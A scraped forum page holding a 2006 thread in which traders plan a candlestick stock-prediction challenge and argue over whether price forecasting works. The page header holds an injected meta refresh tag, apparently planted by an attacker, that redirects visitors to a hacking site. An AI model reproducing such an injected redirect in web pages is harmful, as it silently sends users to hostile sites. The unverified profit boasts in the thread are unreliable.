Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - Candlestick Challenge
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Candlestick Challenge
Goto page 1, 2  Next

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
S2

PostPosted: Sun Mar 19, 2006 3:43 pm    Post subject: Candlestick Challenge Reply with quote

I would like to offer a challenge open to all commers. It will cost you nothing and the winner get's to claim bragging rights.

The challenge is to pick five (maybe 10?) stocks and using candlesticks, or what ever combination of tools you prefer, predict where the price will be in two weeks time for each stock.

Posting of stocks and the prdicted targets should be made by Sunday night with the Friday close in two weeks being the conclusion.

If this sounds like something intersting to you let's get organized and make it happen. You have nothing to lose and get a chance to improve your trading skills.

Anyone up to the challenge? Any additional rule suggestions?

S2
jasonnoguchi

PostPosted: Sun Mar 19, 2006 11:40 pm    Post subject: Reply with quote

Hi,

Sounds interesting. Who is taking up this challenge? I am game for it but do not wish to be the only one here doing it. Smile
New2Trading

PostPosted: Mon Mar 20, 2006 5:01 pm    Post subject: Reply with quote

Im game.
jasonnoguchi

PostPosted: Wed Mar 22, 2006 11:02 pm    Post subject: First Win This Week Reply with quote

Made 223% Profit on a morning star on SHFL. Entered on Monday 20 Mar 06, sold today at 22 Mar 06.
Bluto

PostPosted: Wed Mar 22, 2006 11:40 pm    Post subject: Reply with quote

Does the winner have to reveal their predictive secrets? Very Happy
S2

PostPosted: Thu Mar 23, 2006 12:04 am    Post subject: Reply with quote

Only if you are using a de Lorean done up as a time machine. Wink

I was just thinking of listing your stock picks and the price you think those stocks will be at in a weeks time. It would be nice, from an eductional standpoint, if you shared some insight as to how you came up with those numbers, especially if they are accurate; but not a requirement.

I would suggest scoring be done like in horseshoes, close is good, closer is better. Closeness being the difference between the price predicted and the actual price as a percentage of the actual price.

Also, selected stocks should be traded on one of the three major US exchanges (NYSE, AMEX & NASDAQ)

I will not be available for the rest of the month so you will either have to start without me if there is enough interest, or wait until the first week in April to start.

S2
curt1229

PostPosted: Thu Mar 23, 2006 9:00 am    Post subject: Re: First Win This Week Reply with quote

jasonnoguchi wrote:
Made 223% Profit on a morning star on SHFL. Entered on Monday 20 Mar 06, sold today at 22 Mar 06.

Jasonnoguchi: Outstanding trade! Congratulations. I'm just curious how you traded this one since it was only a six point gain in the stock price? Did you purchase in/at/out of the money options on this one? And how did you determine which option to buy? Thanks in advance.
New2Trading

PostPosted: Thu Mar 23, 2006 11:19 am    Post subject: Reply with quote

S2,

We could start in April when your back?

Im a newbie, but would love to have a go at the challenge, wil learn from it.

Thanks

Matt
doji

PostPosted: Sat Apr 08, 2006 3:51 pm    Post subject: Reply with quote

Market prediction is extreamly difficult. I don't try and predict markets, I just trade them. I can however, predict that if you try this challenge, no one will predict one stock accurately, with in say a dime, either way. I would recommend that you just trade for several days or weeks and post your trades real time (the chart time must mathc the execution on the post), and at the end of the period, you have to post your confirmation report from your broker. This way it's clear that what you say you do, you did. Because if you aren't risking money than this is just an exercise in something other than trading.
Good luck, I'll be watching from a distance.
Bluto

PostPosted: Sun Apr 09, 2006 1:59 pm    Post subject: Reply with quote

doji wrote:
Market prediction is extreamly difficult. I don't try and predict markets, I just trade them. I can however, predict that if you try this challenge, no one will predict one stock accurately, with in say a dime, either way. I would recommend that you just trade for several days or weeks and post your trades real time (the chart time must mathc the execution on the post), and at the end of the period, you have to post your confirmation report from your broker. This way it's clear that what you say you do, you did. Because if you aren't risking money than this is just an exercise in something other than trading.
Good luck, I'll be watching from a distance.

My oh my....you sound like a random walker. Wink There are excellent techniques to take a good trending stock and forecast with a high degree of accuracy where it will be in a week or so. I don't think that the intent here is to impose a lot of strict formality with the requirement of backing up your banter with brokerage statements, etc. If someone posts a stock prediction today as a strong watchlist candidate and in fact that stock performs nicely in days ahead, they'll have my respect.
doji

PostPosted: Sun Apr 09, 2006 6:31 pm    Post subject: Reply with quote

"My oh my, Random walker" you're funny.
Let's see these excellent forcasting tools, just post yours, teach us other blokes how you do it.
Bluto

PostPosted: Sun Apr 09, 2006 7:26 pm    Post subject: Reply with quote

doji wrote:
"My oh my, Random walker" you're funny.
Let's see these excellent forcasting tools, just post yours, teach us other blokes how you do it.

I'm afraid I'd have to charge you. Very Happy
doji

PostPosted: Sun Apr 09, 2006 8:57 pm    Post subject: Reply with quote

So you'd have to charge me, but if you get enough people for this "challenge", you'd do if for free? This makes no sense to me.
How about this, you post audited returns for the past 24 months and if they're above average (> 20% CAGR, 5 to 10% max DD, with < 3months under water), I'd pay for your services.
Since I'm a beginner anyway, I need lots of help.
Thanks
Bluto

PostPosted: Sun Apr 09, 2006 9:58 pm    Post subject: Reply with quote

doji wrote:
So you'd have to charge me, but if you get enough people for this "challenge", you'd do if for free? This makes no sense to me.
How about this, you post audited returns for the past 24 months and if they're above average (> 20% CAGR, 5 to 10% max DD, with < 3months under water), I'd pay for your services.
Since I'm a beginner anyway, I need lots of help.
Thanks

Lol. You're cracking me up. Somehow I suspect you're a bit more than a beginner, but let's just keep it lightweight here and post some of your picks if you feel up to it. I think that's what the author of this thread intended. Audited returns, > 20% CAGR.....bleech! Rolling Eyes
russjackel

PostPosted: Sun Apr 09, 2006 10:18 pm    Post subject: I am game for it Reply with quote

How bout make it that we pick five and the person with the largest total percent gain for the two weeks wins. Seems it would be difficult to determine a winner any other way. Maybe than it could progress to a prize of say----- candlestick1---- gives the winner a secret winning pick for the week. lol Laughing Laughing Laughing Very Happy
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Goto page 1, 2  Next
Page 1 of 2

Jump to: